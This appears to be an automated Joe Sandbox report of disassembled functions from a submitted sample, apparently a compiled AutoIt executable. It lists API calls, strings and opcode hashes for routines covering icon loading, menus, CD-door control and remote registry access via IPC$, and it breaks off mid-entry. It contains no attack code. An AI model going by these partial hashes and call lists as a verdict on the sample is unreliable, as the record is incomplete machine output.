Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: ad0ba10a55fb61c2a79f9481221da2237cc90426fb7bc91badccb59f9e6105c6
Instruction ID: a4c097a6168b31df22a2723548c6230182123f69ae4749ff6d7026e5a9a16399
Opcode Fuzzy Hash: ad0ba10a55fb61c2a79f9481221da2237cc90426fb7bc91badccb59f9e6105c6
Instruction Fuzzy Hash: D5916D312043119FCB05EF20C551A6FB7E5AF9A350F0548ADF8AA5B7A2CB35ED49CB81

Function 00B2B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00B2B8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00B291C2), ref: 00B2B910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B2B949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00B2B98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B2B9C3
FreeLibrary.KERNEL32(?), ref: 00B2B9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B2B9DF
DestroyIcon.USER32(?,?,?,?,?,00B291C2), ref: 00B2B9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00B2BA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00B2BA17

Part of subcall function 00AC2EFD: __wcsicmp_l.LIBCMT ref: 00AC2F86

Strings

.icl, xrefs: 00B2B82A
.dll, xrefs: 00B2B86D
.exe, xrefs: 00B2B84A

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: e92339c4639448c5d3017cb22bf0c8be0d5f5e1f3dcc8361a246d030aea5f6ec
Instruction ID: e8b92b2a17499043fe0a75e95803025ad29aedd5326ccade7be374c27b5881ea
Opcode Fuzzy Hash: e92339c4639448c5d3017cb22bf0c8be0d5f5e1f3dcc8361a246d030aea5f6ec
Instruction Fuzzy Hash: 2661FF71900229BAEB14DF64DD41FBE7BBCEB08710F104569F919D61D0DF74A981DBA0

Function 00B0DC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00B0DCDC
SystemTimeToFileTime.KERNEL32(?,?), ref: 00B0DCEC
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B0DCF8
__wsplitpath.LIBCMT ref: 00B0DD56
_wcscat.LIBCMT ref: 00B0DD6E
_wcscat.LIBCMT ref: 00B0DD80
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B0DD95
SetCurrentDirectoryW.KERNEL32(?), ref: 00B0DDA9
SetCurrentDirectoryW.KERNEL32(?), ref: 00B0DDDB
SetCurrentDirectoryW.KERNEL32(?), ref: 00B0DDFC
_wcscpy.LIBCMT ref: 00B0DE08
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B0DE47

Strings

*.*, xrefs: 00B0DE02

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 99cfbc78d33b84f61e7c3c387b303c042a40aa66195d602af8e5eb80f29d8511
Instruction ID: 036884512454f57a47b189b6a7d7e4aa2b3b4e68af4069765ca45ac8c35342a3
Opcode Fuzzy Hash: 99cfbc78d33b84f61e7c3c387b303c042a40aa66195d602af8e5eb80f29d8511
Instruction Fuzzy Hash: F96169725042059FDB20EF60C944EAFB7E8FF89310F04496EF98987291EB35E945CB92

Function 00B09C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00B09C7F

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00B09CA0
__swprintf.LIBCMT ref: 00B09CF9
__swprintf.LIBCMT ref: 00B09D12
_wprintf.LIBCMT ref: 00B09DB9
_wprintf.LIBCMT ref: 00B09DD7

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 00B09DB4
^ ERROR , xrefs: 00B09D4E
Line %d (File "%s"):, xrefs: 00B09CF3, 00B09D0C
Error: , xrefs: 00B09D81
Incorrect parameters to object property !, xrefs: 00B09D5B
"%s" (%d) : ==> %s:, xrefs: 00B09DD2

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: 6e154e44f5ca269951a862d029ffcf638d8f2b4b8a2328e30f4992d8d71b1d50
Instruction ID: 65f0d4179a8267ce7157aa513101ca2d97b67f02ec3b02bc2b7e1aa27c9bdda2
Opcode Fuzzy Hash: 6e154e44f5ca269951a862d029ffcf638d8f2b4b8a2328e30f4992d8d71b1d50
Instruction Fuzzy Hash: 23516C72900609AACF15EBE0DE46EEEBBB9EF05300F5001A5F505731E2EB356E59DB60

Function 00B0A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00AA9837: __itow.LIBCMT ref: 00AA9862
Part of subcall function 00AA9837: __swprintf.LIBCMT ref: 00AA98AC

CharLowerBuffW.USER32(?,?), ref: 00B0A3CB
GetDriveTypeW.KERNEL32 ref: 00B0A418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B0A460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B0A497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B0A4C5

Part of subcall function 00AA7BCC: _memmove.LIBCMT ref: 00AA7C06

Strings

wait, xrefs: 00B0A482
open, xrefs: 00B0A3F2
set cd door , xrefs: 00B0A466
type cdaudio alias cd wait, xrefs: 00B0A443
close cd wait, xrefs: 00B0A4B0
open , xrefs: 00B0A427
closed, xrefs: 00B0A3DF, 00B0A3E8
close, xrefs: 00B0A3D1

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 9a019f56e177ade2babb43b86fbc5394f8f06c86122371dd523e52da9474fa51
Instruction ID: c4e1d820d1c08de473b865f4e53a79ab42fd9f8ba2ab79446d6b1ccfe84013fb
Opcode Fuzzy Hash: 9a019f56e177ade2babb43b86fbc5394f8f06c86122371dd523e52da9474fa51
Instruction Fuzzy Hash: 48514C761043059FC700EF20C98196FB7E4EF89758F0048ADF896572A1DB31AD0ACB52

Function 00AFF8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00ADE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00AFF8DF
LoadStringW.USER32(00000000,?,00ADE029,00000001), ref: 00AFF8E8

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

GetModuleHandleW.KERNEL32(00000000,00B65310,?,00000FFF,?,?,00ADE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00AFF90A
LoadStringW.USER32(00000000,?,00ADE029,00000001), ref: 00AFF90D
__swprintf.LIBCMT ref: 00AFF95D
__swprintf.LIBCMT ref: 00AFF96E
_wprintf.LIBCMT ref: 00AFFA17
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AFFA2E

Strings

Line %d (File "%s"):, xrefs: 00AFF957
%s (%d) : ==> %s: %s %s, xrefs: 00AFFA12
Line %d:, xrefs: 00AFF968
^ ERROR, xrefs: 00AFF9C3
Error: , xrefs: 00AFF9E5

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: ea28460dce11def128f8008f9408eae7ed48ad47ccdc78b9fe70703ed97caa0d
Instruction ID: e57a241c3815859441498590dc8bb6502e37469241b67726ddc0a8dc8b449711
Opcode Fuzzy Hash: ea28460dce11def128f8008f9408eae7ed48ad47ccdc78b9fe70703ed97caa0d
Instruction Fuzzy Hash: 33412B7280420DAACB15FBE0DE96EEFB778AF15350F500065B605B70A2EB356F09CA61

Function 00B2BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00B29207,?,?), ref: 00B2BA56
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00B29207,?,?,00000000,?), ref: 00B2BA6D
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00B29207,?,?,00000000,?), ref: 00B2BA78
CloseHandle.KERNEL32(00000000,?,?,?,?,00B29207,?,?,00000000,?), ref: 00B2BA85
GlobalLock.KERNEL32(00000000), ref: 00B2BA8E
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00B29207,?,?,00000000,?), ref: 00B2BA9D
GlobalUnlock.KERNEL32(00000000), ref: 00B2BAA6
CloseHandle.KERNEL32(00000000,?,?,?,?,00B29207,?,?,00000000,?), ref: 00B2BAAD
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00B29207,?,?,00000000,?), ref: 00B2BABE
OleLoadPicture.OLEAUT32(?,00000000,00000000,00B32CAC,?), ref: 00B2BAD7
GlobalFree.KERNEL32(00000000), ref: 00B2BAE7
GetObjectW.GDI32(00000000,00000018,?), ref: 00B2BB0B
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00B2BB36
DeleteObject.GDI32(00000000), ref: 00B2BB5E
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00B2BB74

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 15808387611753808de0d829e26d55771bfd4d9c386a915a7caae036a46c2f97
Instruction ID: 4d8595fae7b1a19c325d77f4a24df612978b24c495fb86adcb72506fad658383
Opcode Fuzzy Hash: 15808387611753808de0d829e26d55771bfd4d9c386a915a7caae036a46c2f97
Instruction Fuzzy Hash: 66412975600215EFDB219F65EC88EBABBF9FB89711F1040A8F919D7260DB709D02CB60

Function 00B0D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 00B0DA10
_wcscat.LIBCMT ref: 00B0DA28
_wcscat.LIBCMT ref: 00B0DA3A
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B0DA4F
SetCurrentDirectoryW.KERNEL32(?), ref: 00B0DA63
GetFileAttributesW.KERNEL32(?), ref: 00B0DA7B
SetFileAttributesW.KERNEL32(?,00000000), ref: 00B0DA95
SetCurrentDirectoryW.KERNEL32(?), ref: 00B0DAA7

Strings

*.*, xrefs: 00B0DAE6

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 24d86f07fda8db883f9432039b88f54eda08d4599dd6d8a0b2512a6f836152de
Instruction ID: 648c29066b0e49fa5c4c9431cdd11ad55b4b1f0b3afc53ba4852fa8187ad009c
Opcode Fuzzy Hash: 24d86f07fda8db883f9432039b88f54eda08d4599dd6d8a0b2512a6f836152de
Instruction Fuzzy Hash: A58161716043419FCB24DFA4C984A6ABBE4EF89710F1488AEF889C72D1EB34D945CB52

Function 00B2C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B2C1FC
GetFocus.USER32 ref: 00B2C20C
GetDlgCtrlID.USER32(00000000), ref: 00B2C217
_memset.LIBCMT ref: 00B2C342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00B2C36D
GetMenuItemCount.USER32(?), ref: 00B2C38D
GetMenuItemID.USER32(?,00000000), ref: 00B2C3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00B2C3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00B2C41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B2C454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00B2C489

Strings

0, xrefs: 00B2C33A

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: ac64e9249d2e5232991c9d90a1eb3ef0b3b34656c9ae9632fb7ec95490435a87
Instruction ID: 8f39dbd5b031e063d7b587b1ae9f22593c0a127cb4a287fed68027c4aebba98c
Opcode Fuzzy Hash: ac64e9249d2e5232991c9d90a1eb3ef0b3b34656c9ae9632fb7ec95490435a87
Instruction Fuzzy Hash: C1819D702083219FD720DF14E994A7FBBE8FB88714F104A6EF99997291CB70D905CB92

Function 00B1731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00B1738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00B1739B
CreateCompatibleDC.GDI32(?), ref: 00B173A7
SelectObject.GDI32(00000000,?), ref: 00B173B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00B17408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00B17444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00B17468
SelectObject.GDI32(00000006,?), ref: 00B17470
DeleteObject.GDI32(?), ref: 00B17479
DeleteDC.GDI32(00000006), ref: 00B17480
ReleaseDC.USER32(00000000,?), ref: 00B1748B

Strings

(, xrefs: 00B17410

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 89b2ce38b897ae4e028c1937431bdae87a34bd6deebe7ca930576505ed2d5cff
Instruction ID: 047b1a696d5801402ced36740139af397ddc3fd042c9afea501ca9b6a5a48a84
Opcode Fuzzy Hash: 89b2ce38b897ae4e028c1937431bdae87a34bd6deebe7ca930576505ed2d5cff
Instruction Fuzzy Hash: FF513775944209EFCB25CFA8DC85EAEBBF9EF48310F14856DF95A97210CB31A9428B50

Function 00AA6A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00AC0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00AA6B0C,?,00008000), ref: 00AC0973

Part of subcall function 00AA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA4743,?,?,00AA37AE,?), ref: 00AA4770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00AA6BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00AA6CFA

Part of subcall function 00AA586D: _wcscpy.LIBCMT ref: 00AA58A5

Part of subcall function 00AC363D: _iswctype.LIBCMT ref: 00AC3645

Strings

Unterminated string, xrefs: 00ADE7E4
>>>AUTOIT SCRIPT<<<, xrefs: 00ADE496
Error opening the file, xrefs: 00ADE43D, 00ADE4B8
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00ADE421
EA06, xrefs: 00ADE452
Bad directive syntax error, xrefs: 00ADE79D
AU3!, xrefs: 00AA6B61

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: b3541a4bb81d3a4011d4170a05fd91e73ce0f2444ba1253e760c96b2c673b303
Instruction ID: c7a0398478755d5fda46b6b2adffa4466948ad25aa265abf9e76a7a710b1bc1d
Opcode Fuzzy Hash: b3541a4bb81d3a4011d4170a05fd91e73ce0f2444ba1253e760c96b2c673b303
Instruction Fuzzy Hash: 18029B305083419FC724EF24C981AAFBBF5EF9A354F14482EF48A972A1DB30D949CB52

Function 00B02D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B02D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00B02DDD
GetMenuItemCount.USER32(00B65890), ref: 00B02E66
DeleteMenu.USER32(00B65890,00000005,00000000,000000F5,?,?), ref: 00B02EF6
DeleteMenu.USER32(00B65890,00000004,00000000), ref: 00B02EFE
DeleteMenu.USER32(00B65890,00000006,00000000), ref: 00B02F06
DeleteMenu.USER32(00B65890,00000003,00000000), ref: 00B02F0E
GetMenuItemCount.USER32(00B65890), ref: 00B02F16
SetMenuItemInfoW.USER32(00B65890,00000004,00000000,00000030), ref: 00B02F4C
GetCursorPos.USER32(?), ref: 00B02F56
SetForegroundWindow.USER32(00000000), ref: 00B02F5F
TrackPopupMenuEx.USER32(00B65890,00000000,?,00000000,00000000,00000000), ref: 00B02F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00B02F7E

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: fe683f53eec50a5963d7013161af8f9434849e8a0b826966879f83d52c4b100c
Instruction ID: 5c68435568f59f4d9d83abc49429dcee82447c3044bf9ec17419c526553fc627
Opcode Fuzzy Hash: fe683f53eec50a5963d7013161af8f9434849e8a0b826966879f83d52c4b100c
Instruction Fuzzy Hash: 8871D670640216BFEB218F54DC8DFAABFA4FF04754F140266F615A61E1CBB15C58D790

Function 00AF77DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA7BCC: _memmove.LIBCMT ref: 00AA7C06

_memset.LIBCMT ref: 00AF786B
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00AF78A0
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00AF78BC
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00AF78D8
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00AF7902
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00AF792A
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00AF7935
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00AF793A

Strings

SOFTWARE\Classes\, xrefs: 00AF780C
\IPC$, xrefs: 00AF7882
\CLSID, xrefs: 00AF7822

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: 1ddca1eddadddcc48a9a946315df73ce6cb79164a0aa859afe6aea7a853c4593
Instruction ID: 185bd215516217d03054e95b0df68cb6ae5a84be163cc54a6cc4b97bf55192c0
